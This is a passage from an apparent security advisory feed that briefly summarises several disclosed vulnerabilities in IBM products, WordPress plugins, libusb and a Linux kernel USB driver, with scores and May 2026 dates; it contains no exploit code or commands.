A security bypass vulnerability has been identified in IBM WebSphere Application Server Liberty in versions from 22.0.0.11 up to but not including 26.0.0.5. A remote attacker could bypass security measures under certain conditions by exploiting a specific timing window. The issue arises when the appSecurity-3.0, appSecurity-4.0, or appSecurity-5.0 features are enabled.

5.0
May 27, 2026

IBM App Connect Enterprise Confidential Information Disclosure Vulnerability

A vulnerability exists in IBM App Connect Enterprise versions 13.0.1.0 through 13.0.7.0, where potentially sensitive information is logged in files that could be accessed by a local user. This issue affects users of WS-Security with Java 17.

3.1
May 27, 2026

IBM Controller Hard-Coded Credentials Vulnerability

A vulnerability exists in IBM Controller versions 11.0.1, 11.1.0, 11.1.1, and 11.1.2 due to hard-coded credentials, such as passwords or cryptographic keys, used for inbound authentication, outbound communication with external components, or encryption of internal data. This vulnerability could potentially be exploited to bypass authentication or access sensitive information.

3.1
May 27, 2026

IBM WebSphere Application Server and WebSphere Application Server Liberty Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in IBM WebSphere Application Server - Liberty in versions from 19.0.0.7 up to but not including 26.0.0.5, as well as in IBM WebSphere Application Server versions 9.0 and 8.5. A remote attacker can send specially crafted requests that cause the server to consume excessive memory, potentially leading to service disruption.

5.5
May 27, 2026

SeedProd Pro Local File Inclusion Vulnerability

A local file inclusion vulnerability has been identified in the SeedProd Pro WordPress plugin, affecting versions prior to 6.19.5. The weakness is improper control of the filename passed to a PHP include or require statement (the weakness class labelled 'PHP Remote File Inclusion'), which here allows files chosen by the attacker to be included.

2.6
May 27, 2026

WebToffee Product Import Export for WooCommerce Broken Access Control Vulnerability

A broken access control vulnerability has been identified in the WebToffee Product Import Export for WooCommerce plugin, affecting versions through 2.5.6. This vulnerability arises from missing authorization checks, which could allow an unprivileged user to perform actions reserved for higher privileges.

4.6
May 27, 2026

libusb Out-of-Bounds Read Vulnerability in parse_iad_array() Function

A one-byte out-of-bounds read vulnerability has been identified in libusb versions prior to 1.0.30, in the parse_iad_array() function in descriptor.c. A malformed USB descriptor whose bLength value is one byte less than the total size defeats the function's bounds check, so the parser reads one byte past the allocated buffer, leading to a denial of service. In virtualized environments with USB passthrough, such crafted descriptors reach the parser through libusb_get_active_interface_association_descriptors or libusb_get_interface_association_descriptors.

5.9
May 27, 2026

Linux Kernel USB Driver Resource Management Vulnerability in UCAN Interface

A vulnerability in the Linux kernel's USB driver for UCAN devices can leak memory. Resources allocated by the driver had their lifetime tied to the parent USB device rather than to the USB interface, so unbinding the driver without physically disconnecting the device left that memory unreleased, and repeated unbinds let it accumulate. The fix ties the control message buffer's lifetime to the interface so that it is released when the driver is unbound.

6.2